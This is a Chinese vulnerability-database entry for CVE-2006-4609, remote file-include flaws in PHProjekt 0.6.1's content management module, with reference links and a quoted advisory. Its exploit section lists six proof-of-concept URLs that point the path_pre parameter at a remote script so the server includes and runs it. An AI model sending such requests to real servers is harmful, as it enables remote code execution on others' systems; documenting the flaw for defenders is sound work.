PHProjekt 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110868 漏洞类型 未知
发布时间 2006-08-21 更新时间 2006-09-13
CVE编号 CVE-2006-4609 CNNVD-ID CNNVD-200609-068
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/28418
https://cxsecurity.com/issue/WLB-2006090023
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-068
|漏洞详情
PHProjekt0.6.1的"内容管理"模块("内容管理器")中的多个PHP远程文件包含漏洞,在启用register_globals时,可让远程攻击者通过(1)cm_lib.inc.php,(2)doc/br.edithelp.php,(3)doc/de.edithelp.php,(4)doc/ct.edithelp.php,(5)userrating.php和(6)listing.php中的path_pre参数执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19628/info

Multiple remote file-include vulnerabilities affect the Content Management module for PHProjekt because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. 

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. 

These issues affect version 0.6.1; earlier versions may also be vulnerable.

http://www.example.com/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif? 
http://www.example.com/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif? http://www.example.com/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif? http://www.example.com/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif? 
http://www.example.com/[Path]/userrating.php?path_pre=http://cmd.gif? 
http://www.example.com/[Path]/listing.php?path_pre=http://cmd.gif?
|参考资料

来源:BUGTRAQ
名称:20060823Re:PHProjektv0.6.1RemoteFileInclusionVulnerability(2)
链接:http://www.securityfocus.com/archive/1/archive/1/444220/100/100/threaded
来源:BUGTRAQ
名称:20060821PHProjektv0.6.1RemoteFileInclusionVulnerability(2)
链接:http://www.securityfocus.com/archive/1/archive/1/444076/100/100/threaded
来源:VUPEN
名称:ADV-2006-3373
链接:http://www.frsirt.com/english/advisories/2006/3373
来源:OSVDB
名称:28217
链接:http://www.osvdb.org/28217
来源:SREASON
名称:1495
链接:http://securityreason.com/securityalert/1495
来源:SECUNIA
名称:21590
链接:http://secunia.com/advisories/21590